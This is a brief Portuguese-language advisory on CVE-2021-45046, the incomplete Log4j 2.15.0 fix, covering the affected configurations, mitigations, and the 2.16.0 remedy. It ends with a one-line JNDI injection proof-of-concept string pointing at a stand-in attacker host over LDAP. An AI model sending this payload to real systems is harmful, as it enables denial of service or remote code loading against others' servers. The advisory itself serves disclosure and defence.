
Log4j 2.15.0 Escalação de Privilégios -- CVE-2021-45046

Foi descoberto que a correção para o CVE-2021-44228 no Apache Log4j 2.15.0 estava incompleta em certas configurações não padrão. Isso poderia permitir que atacantes com controle sobre os dados de entrada do Thread Context Map (MDC) quando a configuração de logging usa um Pattern Layout não padrão com uma Context Lookup (por exemplo, $${ctx:loginId}) ou um padrão Thread Context Map (%X, %mdc, ou %MDC) para criar dados de entrada maliciosos usando um padrão JNDI Lookup resultando em um ataque de negação de serviço (DOS). O Log4j 2.15.0 restringe consultas JNDI LDAP para localhost por padrão. Note que mitigações anteriores envolvendo configuração como definir a propriedade de sistema log4j2.noFormatMsgLookup como true NÃO mitigam esta vulnerabilidade específica. O Log4j 2.16.0 corrige este problema removendo o suporte para padrões de busca em mensagens e desabilitando a funcionalidade JNDI por padrão. Este problema pode ser mitigado em versões anteriores (<2.16.0) removendo a classe JndiLookup do classpath (exemplo: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).
Poc
${jndi:ldap://127.0.0.1#evil[.]com:1389/a}